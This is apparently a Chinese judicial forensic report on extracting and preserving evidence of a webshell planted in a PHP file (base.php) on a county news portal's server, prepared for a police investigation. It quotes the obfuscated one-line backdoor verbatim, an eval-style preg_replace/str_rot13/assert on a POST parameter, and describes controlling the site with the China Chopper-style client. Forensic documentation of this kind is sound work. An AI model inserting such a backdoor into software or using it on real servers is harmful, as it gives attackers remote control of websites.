种植木马的网页进行提取固定与鉴定【案情简介】 据委托人介绍:黄石市公安局经济技术开发区公安局为了查明李某某、邓某某非法入侵与破坏计算机系统案,根据《中华人民共和国刑事诉讼法》第一百四十四条之规定,特聘请湖北诚实计算机司法鉴定所对“www.xxxxx.com.cn”(湖北省***新闻综合门户网站)种植木马的网页文件进行提取与鉴定。 (一)鉴定方法 依据司法部司法鉴定规范SF/Z JD0400001-2014《电子数据司法鉴定通用实施规范》进行鉴定。 (二)鉴定设备 取证工作站。 (三)鉴定软件 Hash.exe哈希值计算工具(版本:1.0.4.0),WinSnap.exe(版本:V3.1.5),FastStone Capture for Windows(版本:8.0),Notepad++.exe(版本:7.31)。(所有软件运行正常) (四)提取与鉴定过程 1、现场远程连接“www.xxxxxx.com.cn”(xxx新闻综合门户)网站服务器,提取服务器“D盘-xnjy-phpcms”路径下“base.php”网页文件,如图1,利用Hase.exe软件计算文件MD5值:E458E874DE5389AA00F7B01B5E3E333C,并用FastStone Capture for Windows软件录制提取操作视频。
图1、远程连接网站服务器提取种植有一句话木马网页文件“base.php” 2、用Notepad++.exe软件打开提取的文件“base.php”,找出一句话木马,如图2,一句话木马代码为第10行“preg_replace("/[errorpage]/e",@str_rot13('@nffreg($_CBFG[cntr]);'),"saft");”。
图2、用Notepad++.exe软件打开提取的文件“base.php” 3、利用嫌疑人李**和王**三星笔记本提取的一句话木马客户端软件中国菜刀“XISE WebShell管理V3.0”连接此网站,连接成功并且可进入进行文件管理,利用“XISE WebShell管理V3.0”软件进入文件管理显示的此网站根目录和远程登录服务器直接查看网站根目录内容对比如图3。
图3、利用“XISE WebShell管理V3.0”软件进入文件管理显示的此网站根目录和远程登录服务器直接查看网站根目录内容对比 4、远程登录网站服务器,将服务器上的文件“base.php”命名为“base1.php”,再上传去掉了一句话木马代码的同名文件“base.php”,再用一句话木马客户端软件中国菜刀“XISE WebShell管理V3.0”连接此网站,显示读取失败,未连接成功,如图4、图5。
图4、上传的去掉了一句话木马代码的同名文件“base.php”
图5、去掉一句话木马代码后连接,显示读取失败 5、利用一句话木马客户端软件中国菜刀“XISE WebShell管理V3.0”进入网站文件管理后,可对网站文件进行编辑修改,删除,下载,同时可以在网站上上传文件,新建文件,如图6。
图6、中国菜刀“XISE WebShell管理V3.0”软件连接网站进行文件管理后可进行的操作 6、现场勘查情况:2017年9月11日湖北诚实计算机司法鉴定所司法鉴定人陈敬民、吴友松,工程师陈强与黄石市公安局经济技术开发区公安局李警官、王警官到湖北省**县新闻中心进行现场取证,现场勘查记录表附后,见附件1。 (五)固定电子物证 将提取的电子物证和取证截图、录制的视频文件复制到专用存储介质中,采用光盘封盘刻录的方式刻录成电子物证光盘1张,光盘的编号为180371-CD1。计算光盘的MD5值(见附件2电子物证光盘)。 【分析说明】 经过对***新闻综合门户网站“www.xxxxxx.com.cn”服务器上种植有一句话木马的网页文件提取,在网页文件“base.php”源代码内找到一句话木马代码“preg_replace("/[errorpage]/e",@str_rot13('@nffreg($_CBFG[cntr]);'),"saft");”,通过一句话木马客户端软件“XISE WebShell管理V3.0”可对种植有一句话木马的网站进行连接和管理,可对网站内的文件进行编辑修改、删除、下载,同时可以上传文件,新建文件。 【鉴定意见】 经鉴定,在***新闻综合门户网站“www.xxxxxx.com.cn”服务器提取了被种植的“一句话木马”网页文件(base.php),固定为电子物证光盘一张“180371-CD1”,见附件2。
文章分类:
存在性鉴定
|